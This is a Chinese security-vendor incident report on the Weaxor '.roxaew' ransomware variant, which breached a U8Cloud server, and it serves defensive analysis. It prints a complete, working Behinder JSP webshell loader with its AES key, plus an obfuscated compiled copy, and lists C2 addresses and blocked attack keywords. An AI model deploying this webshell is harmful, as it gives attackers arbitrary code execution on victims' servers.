文章总结: Weaxor勒索病毒新变种roxaew近期活跃,利用用友U8Cloud漏洞植入冰蝎内存马进行攻击。攻击者获取权限后执行加密与挖矿程序并清除日志,疑似基于Mallox源码修改。建议企业及时修补漏洞、强化口令策略、部署WAF并完善备份机制以防范此类勒索攻击。
综合评分: 90
文章分类: 应急响应,恶意软件,漏洞分析,逆向分析,威胁情报
【紧急警示】Weaxor 新变种“roxaew”借 nday 漏洞大肆攻击,多家企业中招!深度剖析与防御指南
原创
solarsec
solar应急响应团队
2025年9月9日 14:34
中国香港
近三个月,Solar应急响应团队共接到多起勒索病毒排查需求,累计排查112起相关事件。其中 Weaxor勒索家族最为活跃,发生46起,占比约41%,位列第一。受害系统的加密文件后缀以“.roxaew”为主,共29起,占比约63%。该后缀属于Weaxor近期新增的变种标识,与今年4、5月我们发布的紧急警示中出现的后缀均不相同,表明该家族仍在持续更新迭代、快速演进。
本次分享选取了一个真实处置案例(已做脱敏处理),以展示其典型攻击链及溯源过程。攻击者疑似利用 用友 U8Cloud 系统历史文件上传漏洞,上传“冰蝎”JSP内存马后门,从而成功获取目标服务器控制权限。随后执行加密程序,并在加密完成后清除相关日志以规避取证。进一步排查中发现,用友系统调用的 java.exe 文件体积异常,经分析确认已被植入挖矿组件,同时存在恶意外联行为。
1.勒索病毒组织介绍
Weaxor家族在2024年11月首次现身,该勒索病毒会将“.rox”扩展名附加到受感染文件的名称后,并留下名为“RECOVERY INFO.txt”的勒索信。信中包含了Weaxor家族的暗网地址,受害者可以通过该地址进入一个一对一的聊天界面,其他人无法访问。值得注意的是,暗网地址的首页为空白,这一设计显得格外耐人寻味。
一对一聊天界面
首页
1.1疑似mallox源码修改
此加密器与mallox家族极其相似,疑似为mallox源码修改之后编译得到,mallox具体分析请参考文章【病毒分析】Mallox勒索家族新版本:加密算法全面解析。
相似之处
1.都为不加密固定的五个语言俄语、哈萨克语、白俄罗斯语、乌克兰语和土库曼语;
2.都调整电源计划为高性能模式;
3.删除的注册表内容一致;
4.密钥生成和加密算法基本一致,但是weaxor在生成随机数的情况下又再次生成了0x38个字节的随机数,修复了mallox会被破解出密钥的情况;
5.信息回传的格式,以及url极其相似,mallox url如下:
http://193.106.191.141/QWEwqdsvsf/ap.php
weaxor url如下:
http://193.143.1.139/Ujdu8jjooue/biweax.php
不同之处
1.weaxor未对关机键进行隐藏;
2.获取文件方式不同,mallox获取文件方式为遍历文件,然后通过完成端口将文件提交到队列中,加密线程通过队列获取文件,而weaxor则是通过一个全局列表来传输;
3.weaxor开启了较高的编译优化,而malllox则没有。
2.勒索病毒样本分析
经对最新变种加密器样本的分析确认,其内部加密机制与早期版本无明显差异,仅新增了不同的加密后缀作为变种特征。相关分析过程与技术细节已在本篇文章中详细展开,欢迎回顾查看【病毒分析】新崛起的weaxor勒索家族:疑似mallox家族衍生版,深度解析两者关联!。
3.攻击分析
本次事件为 Weaxor 勒索病毒变种(“.roxaew”后缀) 攻击。2025 年 4 月 6 日,攻击者疑似利用 用友 U8Cloud 系统历史文件上传漏洞,植入包含 sess.jsp、sess_jsp.java、sess_jsp.class 的冰蝎 JSP 内存马,获取服务器控制权限。在 2025 年 4 月 13 日 11:42,攻击者执行名为VMwhUif.exe的加密器,对服务器数据进行加密,并清除操作日志掩盖痕迹。排查中,D 盾工具发现多个可疑脚本文件,经分析确认均为内存马后门。同时发现服务器存在弱口令问题,U8Cloud 数据库账号密码未进行强度管控,进一步增加了入侵风险。勒索信与 Weaxor 家族典型特征一致,加密器亦被微步沙箱识别为恶意文件。数据恢复后,使用用友官方漏洞检测工具复核,初次扫描确认漏洞存在,经应用官方补丁修复后再次检测结果显示无风险。
进一步追踪发现,U8Cloud 所调用的 java.exe 文件体积异常,并伴随可疑外联。沙箱分析表明该进程关联挖矿域名 serverletwalker.top,并尝试连接位于荷兰阿姆斯特丹的 185.113.8.2,说明攻击者在入侵后可能同时植入挖矿组件,开展多重非法操作。
3.1黑客攻击路线图
4.溯源分析
服务器被植入勒索病毒,文件被加密,加密文件的后缀为.roxaew,根据勒索界面和加密后缀判断该勒索病毒为病毒家族Weaxor的变种病毒。本次中勒索病毒的有一台主机,下面会逐一进行分析。
4.1日志清除
1.黑客于2025/04/13/11:42运行恶意工具执行加密操作
2.黑客在入侵机器后执行完加密操作进行了日志清除操作,故无法查看后续黑客操作轨迹;
4.2可疑木马
3.使用D盾进行扫描,在D: \UBCERP\webapps\u8c_web\路径下发现三个可疑脚本文件,疑似内存马后门文件,上传时间为2025/04/06/ 03:04:01,疑似黑客利用用友U8cloud漏洞上传webshell,从而获取该机器权限;
4.流程:攻击者上传 sess.jsp → 被编译成 sess_jsp.java 和 sess_jsp.class → 加载内存马:
- 攻击者上传 sess.jsp;
sess.jsp
<% // PASS: TDQVK —— 常见为“连接口令/标识”,用于操作者侧记忆
%><%@ page import="java.util.*,javax.crypto.*,javax.crypto.spec.*,sun.misc.BASE64Decoder" %><%! /**
* 自定义类加载器:用于把内存中的字节数组直接定义为可执行的 Class
* 典型用途:将解密后的恶意类“驻留内存”执行(免落盘)
*/classRXwbQextendsClassLoader{ RXwbQ(ClassLoader parent) { super(parent); } /**
* 将字节数组定义为 Class(内存马加载核心)
* @param b 经过AES解密得到的类字节码
*/ public Class ABJeX(byte[] b){ returnsuper.defineClass(b, 0, b.length); }}%><%/**
* 仅在 POST 请求时触发:规避普通 GET 访问被发现
* 典型流程:
* 1)固定 AES 密钥(Behinder/冰蝎常见默认 key);
* 2)读取请求体一行 Base64 文本;
* 3)Base64 解码 -> AES 解密 -> 得到恶意类字节码;
* 4)自定义 ClassLoader 内存加载并实例化;
* 5)调用恶意类的 equals(Object) 方法,把 pageContext 作为入参(常见“入口”)。
*/if (request.getMethod().equals("POST")) { // 固定 AES 密钥(高风险 IOC):Behinder 系列常见 key String HXSlf = "e45e329feb5d925b"; // 将密钥写入会话(老式 API,痕迹:可用于操作者侧状态同步) session.putValue("u", HXSlf); // 初始化 AES Cipher,模式默认为 ECB/PKCS5Padding(取决于JVM默认) Cipher OFYfh = Cipher.getInstance("AES"); OFYfh.init(Cipher.DECRYPT_MODE, new SecretKeySpec(HXSlf.getBytes(), "AES")); // 获取当前线程的上下文类加载器(作为自定义加载器的父加载器) ClassLoader RBbvX = Thread.currentThread().getContextClassLoader(); // 读取一行 POST 数据(通常为Base64后的密文负载) String yXXGq = request.getReader().readLine(); // Base64 解码得到密文字节 byte[] GQMiu = java.util.Base64.getDecoder().decode(yXXGq); // 通过反射调用 javax.crypto.Cipher#doFinal 完成解密(降低静态特征) Class BEDfM = Class.forName("javax.crypto.Cipher"); byte[] clazzBytes = (byte[]) BEDfM .getMethod("doFinal", byte[].class)
.invoke(OFYfh, GQMiu); // 使用自定义类加载器将解密得到的类字节码直接定义为 Class(内存马落地) Class VSCzo = new RXwbQ(RBbvX).ABJeX(clazzBytes); // 实例化并调用其 equals(Object) 方法,传入 pageContext 作为执行上下文 // 常见于冰蝎/哥斯拉等内存马的“入口”方式(滥用 equals 以降低可疑调用特征) VSCzo.newInstance().equals(pageContext);}%><%/**
* 明文输出标记字符串(低可见度心跳/存活提示)
* 取证用途:可作为页面落点与静态关键字 IOC
*/out.println("SecExplorer666");%>
- 自动编译为 sess_jsp.java → sess_jsp.class;
sess_jsp.java
/*
* Generated by the Jasper component of Apache Tomcat
* Version: Apache Tomcat/7.0.103
* Generated at: 2025-04-05 19:04:03 UTC
* Note: The last modified time of this file was set to
* the last modified time of the source file after
* generation to assist with modification tracking.
*/
package org.apache.jsp;import javax.servlet.*;import javax.servlet.http.*;import javax.servlet.jsp.*;import java.util.*;import javax.crypto.*;import javax.crypto.sp\uu0065c.*;import sun.misc.BASE64D\uu0065cod\uu0065r;publicfinalclasssess_jspextendsorg.apache.jasper.runtime.HttpJspBase
implementsorg.apache.jasper.runtime.JspSourceDependent{classRXwbQ \uu0065xt\uu0065ndsClassLoad\uu0065r
{ RXwbQ(ClassLoad\uu0065r OFYfh){sup\uu0065r(OFYfh); } public Class ABJeX(byt\uu0065 []b)
{ r\uu0065turn sup\uu0065r.d\uu0065fin\uu0065Class(b,0,b.l\uu0065ngth); }}privatestaticfinal javax.servlet.jsp.JspFactory _jspxFactory = javax.servlet.jsp.JspFactory.getDefaultFactory();privatestatic java.util.Map<java.lang.String,java.lang.Long> _jspx_dependants;privatevolatile javax.el.ExpressionFactory _el_expressionfactory;privatevolatile org.apache.tomcat.InstanceManager _jsp_instancemanager;public java.util.Map<java.lang.String,java.lang.Long> getDependants() { return _jspx_dependants; }public javax.el.ExpressionFactory _jsp_getExpressionFactory(){ if (_el_expressionfactory == null) { synchronized (this) { if (_el_expressionfactory == null) { _el_expressionfactory = _jspxFactory.getJspApplicationContext(getServletConfig().getServletContext()).getExpressionFactory(); } } } return _el_expressionfactory; }public org.apache.tomcat.InstanceManager _jsp_getInstanceManager(){ if (_jsp_instancemanager == null) { synchronized (this) { if (_jsp_instancemanager == null) { _jsp_instancemanager = org.apache.jasper.runtime.InstanceManagerFactory.getInstanceManager(getServletConfig()); } } } return _jsp_instancemanager; }publicvoid_jspInit(){ }publicvoid_jspDestroy(){ }publicvoid_jspService(final javax.servlet.http.HttpServletRequest request, final javax.servlet.http.HttpServletResponse response)
throws java.io.IOException, javax.servlet.ServletException { final javax.servlet.jsp.PageContext pageContext; javax.servlet.http.HttpSession session = null; final javax.servlet.ServletContext application; final javax.servlet.ServletConfig config; javax.servlet.jsp.JspWriter out = null; final java.lang.Object page = this; javax.servlet.jsp.JspWriter _jspx_out = null; javax.servlet.jsp.PageContext _jspx_page_context = null; try { response.setContentType("text/html"); pageContext = _jspxFactory.getPageContext(this, request, response, null, true, 8192, true); _jspx_page_context = pageContext; application = pageContext.getServletContext(); config = pageContext.getServletConfig(); session = pageContext.getSession(); out = pageContext.getOut(); _jspx_out = out;//PASS: TDQVK out.write('\r'); out.write('\n'); out.write('\r'); out.write('\n');if (r\uu0065qu\uu0065st.g\uu0065tM\uu0065thod().\uu0065quals("POST")){ String HXSlf="e45e329feb5d925b"; s\uu0065ssion.putValu\uu0065("u",HXSlf); Ciph\uu0065r OFYfh=Ciph\uu0065r.g\uu0065tInstanc\uu0065("AES"); OFYfh.init(2,n\uu0065w S\uu0065cr\uu0065tK\uu0065ySp\uu0065c(HXSlf.g\uu0065tByt\uu0065s(),"AES")); ClassLoad\uu0065r RBbvX = Thr\uu0065ad.curr\uu0065ntThr\uu0065ad().g\uu0065tCont\uu0065xtClassLoad\uu0065r();String yXXGq= r\uu0065qu\uu0065st.g\uu0065tR\uu0065ad\uu0065r().r\uu0065adLin\uu0065();byt\uu0065[] GQMiu=(byt\uu0065[]) Bas\uu006564.g\uu0065tD\uu0065cod\uu0065r().d\uu0065cod\uu0065(yXXGq);Class BEDfM=Class.forNam\uu0065("javax.crypto.Ciph\uu0065r");byt\uu0065[] clazzByt\uu0065s=(byt\uu0065[]) BEDfM.g\uu0065tM\uu0065thod("doFinal",byt\uu0065[].class).invok\uu0065(OFYfh,GQMiu);Class VSCzo=n\uu0065w RXwbQ(RBbvX).ABJeX(clazzByt\uu0065s);VSCzo.n\uu0065wInstanc\uu0065().\uu0065quals(pag\uu0065Cont\uu0065xt);} out.write("\r\n"); out.write("\r\n");\u0020\u006F\u0075\u0074\u002E\u0070\u0072\u0069\u006E\u0074\u006C\u006E\u0028\u0022\u0053\u0065\u0063\u0045\u0078\u0070\u006C\u006F\u0072\u0065\u0072\u0036\u0036\u0036\u0022\u0029\u003B out.write('\r'); out.write('\n'); } catch (java.lang.Throwable t) { if (!(t instanceof javax.servlet.jsp.SkipPageException)){ out = _jspx_out; if (out != null && out.getBufferSize() != 0) try { if (response.isCommitted()) { out.flush(); } else { out.clearBuffer(); } } catch (java.io.IOException e) {} if (_jspx_page_context != null) _jspx_page_context.handlePageException(t); elsethrownew ServletException(t); } } finally { _jspxFactory.releasePageContext(_jspx_page_context); } }}
- 被访问时加载到 JVM 内存,等待 POST 请求触发后门逻辑;
- 攻击者通过 POST 请求发送加密 payload(class 字节码),由后门解密、加载并执行;
5.2025/04/19 通过木马路径推测U8Cloud存在历史漏洞导致黑客进行漏洞利用从而执行加密器,在数据恢复后,使用用友厂商检测恢复工具的确检测出该系统存在漏洞,修复完补丁漏洞后再次执行显示无漏洞,由此也验证该系统确实存在历史漏洞未作修复导致黑客成功入侵;
第一次存在漏洞修复
漏洞修复提示无更新
4.3木马解析
6.sess.jsp 是一个典型的 JSP WebShell 加载器,通过 Unicode 混淆隐藏真实代码,核心逻辑是读取攻击者 POST 请求中的 Base64 编码数据,用固定密钥 e45e329feb5d925b 进行 AES 解密,再利用自定义 ClassLoader 动态加载并执行内存中的恶意类,最终实现任意代码执行,并在页面输出标记字符串 SecExplorer666 作为回显确认。
4.4安全加固排查
7.在完成溯源环节后,进入安全加固排查阶段。通过对主机及网络连接情况进行逐项核查时,发现存在可疑外联行为,疑似与异常进程相关联。
8.进一步利用微步威胁情报平台对目标 IP 进行检索,确认该 IP 地址(185.113.8.2)归属地为荷兰北荷兰省阿姆斯特丹。该外联行为疑似与异常进程相关联
9.通过定位该 IP 对应的 PID 进程,发现其关联程序为 java.exe。在使用 Everything 工具检索时注意到该 java.exe 文件大小异常,与正常版本存在差异。结合其异常路径特征,将样本上传至微步威胁情报平台进行检测,结果显示为可疑软件。进一步分析发现,该进程存在外联行为,目标域名为 serverletwalker.top,疑似与恶意远控或数据泄露活动相关。
10.由于当时未能获取到 U8C 系统的相关日志,导致关键取证数据缺失,无法对攻击链条及入侵方式进行更进一步的溯源分析。
接下来,我们还会针对java.exe异常进程开展逆向分析,推出详尽的技术解析文章,为大家揭示更多攻击细节,敬请期待。
5.防范措施
5.1升级与补丁管理
- 定期漏洞检测:使用专业漏洞扫描工具(如用友官方检测工具、Nessus等)对业务系统进行周期性检查。
- 及时补丁修复:确保业务系统、数据库、中间件、Web 组件及第三方依赖库均安装最新安全补丁。
- 补丁验证:补丁上线前应在测试环境验证业务兼容性,避免直接生产变更导致服务异常。
5.1服务与端口安全
- 最小开放原则:对业务系统进行全面端口扫描(如 Nmap),关闭一切非必要的对外开放端口。
- 高危端口管控:限制数据库端口(如 1433、3306)及 RDP 端口(3389)的外网访问,必须使用时应启用防火墙白名单或 VPN 隧道。
- 防护措施叠加:对无法关闭的服务端口启用防爆破机制与异常访问监控,及时发现异常连接。
5.3账户与口令安全
- 强口令策略:所有系统和应用账号必须符合强口令要求(大小写字母+数字+特殊符号,长度 ≥ 12 位,推荐随机密码生成器)。
- 定期更换:口令需定期更换(建议每 90 天),并禁止使用相同口令跨多个系统。
- 登录防护:启用双因素认证(MFA),对 RDP、VPN、Web 管理后台等关键入口特别重要。
5.4Web 应用防护
- 部署WAF:开启并定期更新 SQL 注入、命令注入、远程代码执行等核心规则集。
- 自定义规则:拦截含有常见攻击关键字(如
UNION SELECT、xp_cmdshell、1=1等)的请求;对敏感参数增加白名单校验。 - 安全开发规范:配合代码审计,要求开发遵循输入校验、输出编码、参数化查询等安全规范。
5.5数据库安全加固
- 最小权限原则:应用程序仅使用最低所需权限的数据库账号,禁止使用
sa、root等高权限账户直连业务。 - 高危命令禁用:禁用
xp_cmdshell、sp_configure、exec等可能被攻击者利用的系统命令。 - 网络隔离:数据库应放置于内网,仅允许应用服务器访问,禁止直接对公网开放。
5.6日志与监控
- 日志审计:启用 Web、系统、数据库日志,定期审查是否存在异常访问或执行记录。
- 实时监控:部署 SIEM/EDR 工具,结合威胁情报对可疑流量、弱口令爆破、异常进程进行告警。
- 取证保全:发现可疑行为时,第一时间保全日志和样本,避免攻击链被清除。
5.7人员安全意识提升
- 定期培训:对技术人员和普通员工定期开展安全意识培训,重点覆盖钓鱼邮件、木马附件、社会工程学防范等。
- 安全演练:定期组织应急响应桌面演练或攻击模拟演练,确保人员熟悉处置流程。
- 制度约束:建立明确的安全管理制度和奖惩机制,避免因疏忽大意导致安全事件发生。
5.8备份与应急准备
- 多级备份机制:核心数据必须有本地与异地双重备份,且启用 离线/只读介质(如 WORM 盘)。
- 定期恢复演练:确保备份数据可用性,避免出现“有备份但无法恢复”的情况。
- 应急预案:建立勒索病毒应急响应流程,包括隔离、溯源、恢复、加固四大环节,确保一旦中招能快速止损。
以下是solar安全团队近期处理过的常见勒索病毒后缀:
| | | |
| — | — | — |
| 收录时间 | 病毒家族 | 相关文章 |
| 2025/01/14 | medusalocker | 【病毒分析】深入剖析MedusaLocker勒索家族:从密钥生成到文件加密的全链路解析 |
| 2025/01/15 | medusa | 【病毒分析】“美杜莎”勒索家族:从入侵到结束的全流程深度解析 |
| 2024/12/11 | weaxor | 【病毒分析】新崛起的weaxor勒索家族:疑似mallox家族衍生版,深度解析两者关联! |
| 2024/10/23 | RansomHub | 【病毒分析】Ransom Hub:唯一不攻击中国的2024全球Top1勒索家族——ESXi加密器深度解析 |
| 2024/11/23 | Fx9 | 【病毒分析】Fx9家族首次现身!使用中文勒索信,熟练勒索谈判 |
| 2024/11/04 | Makop | 【病毒分析】揭秘.mkp后缀勒索病毒!Makop家族变种如何进行可视化加密? |
| 2024/06/26 | moneyistime | 【病毒分析】使用中文勒索信及沟通:MoneyIsTime 勒索家族的本地化语言转变及其样本分析 |
| 2024/04/11 | babyk | 【病毒分析】BabyK加密器分析-Windows篇 【病毒分析】Babyk加密器分析-NAS篇 【病毒分析】Babyk加密器分析-EXSI篇 【病毒分析】Babuk家族babyk勒索病毒分析 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 |
| 2024/09/29 | lol | 【病毒分析】全网首发!全面剖析.LOL勒索病毒,无需缴纳赎金,破解方案敬请期待下篇! 【工具分享】.LOL勒索病毒再也不怕!完整破解教程分享+免费恢复工具首发 |
| 2024/06/10 | MBRlock | 【病毒分析】假冒游戏陷阱:揭秘MBRlock勒索病毒及其修复方法 |
| 2024/06/01 | Rast gang | 【病毒分析】Steloj勒索病毒分析 |
| 2024/06/01 | TargetOwner | 【病毒分析】技术全面升级,勒索赎金翻倍,新版本TargetOwner勒索家族强势来袭? |
| 2024/11/02 | Lockbit 3.0 | 【病毒分析】Lockbit家族Lockbit 3.0加密器分析 【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 【病毒分析】繁体勒索信暗藏玄机!要价50万RMB赎金的Lockbit泄露版分析 |
| 2024/05/15 | wormhole | 【病毒分析】Wormhole勒索病毒分析 |
| 2024/03/20 | tellyouthepass | 【病毒分析】locked勒索病毒分析 【病毒分析】中国人不骗中国人?_locked勒索病毒分析 |
| 2024/03/01 | lvt | 【病毒分析】交了赎金也无法恢复–针对国内某知名NAS的LVT勒索病毒最新分析 |
| 2024/03/04 | phobos | 【病毒分析】phobos家族2700变种加密器分析报告 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 【病毒分析】phobos家族faust变种加密器分析 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 【病毒分析】phobos家族Elbie变种加密器分析报告 |
| 2024/03/28 | DevicData | 【病毒分析】DevicData勒索病毒分析 【病毒分析】DevicData家族扩散:全球企业和机构成为勒索病毒头号攻击目标! |
| 2024/02/27 | live | 【病毒分析】独家揭秘LIVE勒索病毒家族之1.0(全版本可解密) 【病毒分析】独家揭秘LIVE勒索病毒家族之1.5(全版本可解密) 【病毒分析】独家揭秘LIVE勒索病毒家族之2.0(全版本可解密) |
| 2024/08/16 | CryptoBytes | 【独家破解】揭秘境外黑客组织的20美元锁机病毒:深度逆向分析+破解攻略!赎金?给你付个🥚 |
| 2024/03/15 | mallox | 【病毒分析】mallox家族malloxx变种加密器分析报告 【病毒分析】Mallox勒索家族新版本:加密算法全面解析 【病毒分析】全网首发!袭扰国内top1勒索病毒家族Mallox家族破解思路及技术分享 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 【病毒分析】mallox家族rmallox变种加密器分析报告 【病毒分析】Mallox家族再进化:首次瞄准Linux,勒索新版本全面揭秘! |
| 2024/07/25 | BeijngCrypt | 【病毒分析】全网首发!以国内某安全厂商名字为后缀的勒索病毒分析 |
| 2025/03/11 | 银狐 | 【病毒分析】潜伏在AI工具中的幽灵:银狐家族社工攻击的深度剖析 |
| 2025/03/07 | CTF赛题 | 【病毒分析】伪造微软官网+勒索加密+支付威胁,CTF中勒索病毒解密题目真实还原! 【病毒分析】2024年网鼎杯朱雀组REVERSE02——关于勒索木马解密详解 |
| 2025/05/14 | 888 | 【病毒分析】888勒索家族再出手!幕后加密器深度剖析 |
| 2025/06/13 | LockBit4.0 | 【病毒分析】缴纳了巨额赎金依旧无法解密?最新LockBit4.0解密器分析 【病毒分析】LockBit 4.0 vs 3.0:技术升级还是品牌续命?最新LockBit 4.0分析报告 |
勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且分支了很多团伙组织,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库及暴力破解进行加密,攻击手法极多防不胜防。
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2024/12/12 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线:第二篇-流量致盲,无声突破 |
| 2024/12/11 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线:第一篇-驱动漏洞一击致命 |
而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2024/06/27 | 【教程分享】勒索病毒来袭!教你如何做好数据防护 |
| 2024/06/24 | 【教程分享】服务器数据文件备份教程 |
案例介绍篇聚焦于真实的攻击事件,还原病毒家族的攻击路径和策略,为用户提供详细的溯源分析和防护启示;
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2024/06/27 | 【案例介绍】赎金提高,防御失效:某上市企业两年内两度陷入同一勒索团伙之手 |
| 2024/01/26 | 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 |
| 2024-03-13 | 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 |
| 2024-04-01 | 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 |
| 2024-04-26 | 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 |
| 2024-05-17 | 【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 |
| 2024-11-28 | 【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 |
漏洞与预防篇侧重于技术层面的防御手段,针对病毒利用的漏洞和安全弱点,提出操作性强的应对方案:
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2025/01/08 | 【漏洞与预防】RDP弱口令漏洞预防 |
| 2025/01/21 | 【漏洞与预防】MSSQL数据库弱口令漏洞预防 |
| 2025/02/18 | 【漏洞与预防】远程代码执行漏洞预防 |
| 2025/04/10 | 【漏洞与预防】Atlassian Confluence存在远程代码执行漏洞 |
| 2025/04/17 | 【漏洞与预防】畅捷通文件上传漏洞预防 |
| 2025/05/27 | 【漏洞与预防】Microsoft Windows 文件资源管理器欺骗漏洞预防 |
应急响应工具教程篇重点分享应急响应过程中常用工具的安装、配置与使用说明,旨在帮助读者快速掌握这些工具的操作流程与技巧,提高其在实际应急场景中的应用熟练度与效率。
| | |
| — | — |
| 收录时间 | 相关文章 |
| 2025/01/10 | 【应急响应工具教程】Splunk安装与使用 |
| 2025/02/07 | 【应急响应工具教程】取证工具-Volatility安装与使用 |
| 2025/02/20 | 【应急响应工具教程】流量嗅探工具-Tcpdump |
| 2025/02/26 | 【应急响应工具教程】一款精准搜索文件夹内容的工具–FileSeek |
| 2025/03/03 | 【应急响应工具教程】一款自动化分析网络安全应急响应工具–FindAll |
| 2025/03/13 | 【应急响应工具教程】Windows 系统操作历史监控与审计工具-LastActivityView |
| 2025/03/20 | 【应急响应工具教程】镜像取证之挂载镜像——Arsenal Image Mounter |
| 2025/04/03 | 【应急响应工具教程】Windows 系统综合排查工具Hawkeye |
| 2025/04/08 | 【应急响应工具教程】Linux下应急响应工具whohk |
| 2025/05/15 | 【应急响应工具教程】Windows日志快速分析工具——Chainsaw |
| 2025/06/05 | 【应急响应工具教程】Logman 系统性能与日志采集工具 |
| 2025/07/02 | 【应急响应工具教程】QDoctor应急响应神器:一键检测系统安全 |
| 2025/07/08 | 【应急响应工具教程】Linux应急响应工具集:一键式安全评估与可视化报告系统 |
| 2025/07/23 | 【应急响应工具教程】司稽(Whoamifuck):纯Shell打造的Linux应急响应利器 |
| 2025/08/05 | 【应急响应工具教程】主机侧Checklist的自动全面化检测脚本-GScan |
| 2025/08/19 | 【应急响应工具教程】SPECTR3:通过便携式 iSCSI 实现远程证据的只读获取与分析 |
如果您想了解有关勒索病毒的最新发展情况,或者需要获取相关帮助,请关注“solar专业应急响应团队”。
全国热线| 400-613-6816
更多资讯| 扫码加入群组交流
喜欢此内容的人还喜欢
【紧急警示】Weaxor最新变种“.wxx”来袭,批量入国内知名财务类管理系统发起勒索攻击!
索勒安全团队
【紧急通告】Outlook公布高危漏洞CVE‑2025‑47176,攻击者可远程执行代码!
索勒安全团队
【应急响应工具教程】Linux应急响应工具集:一键式安全评估与可视化报告系统 索勒安全团队
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:solar应急响应团队 solarsec《【紧急警示】Weaxor 新变种“roxaew”借 nday 漏洞大肆攻击,多家企业中招!深度剖析与防御指南》